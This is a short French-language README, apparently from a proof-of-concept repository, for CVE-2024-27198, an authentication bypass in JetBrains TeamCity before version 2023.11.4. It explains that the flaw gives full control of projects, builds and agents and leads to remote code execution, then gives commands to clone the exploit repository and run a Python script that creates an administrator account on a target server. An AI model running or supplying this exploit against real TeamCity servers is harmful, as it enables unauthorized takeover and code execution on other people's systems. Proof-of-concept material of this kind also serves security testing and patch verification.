
PoC concernant CVE-2024-27198
Dans JetBrains TeamCity avant la version 2023.11.4, une bypass d'authentification permettant d'effectuer des actions admin sur le serveur TeamCity permet à un attaquant de prendre le contrôle total de tous les projets, builds, agents et artefacts TeamCity, et enfin d'exécuter une RCE.
git clone https://github.com/jrbH4CK/CVE-2024-27198.git
cd CVE-2024-27198
Pour créer un compte avec privilèges admin sur le serveur
python3 cve-2024-27198.py http://example.com username password

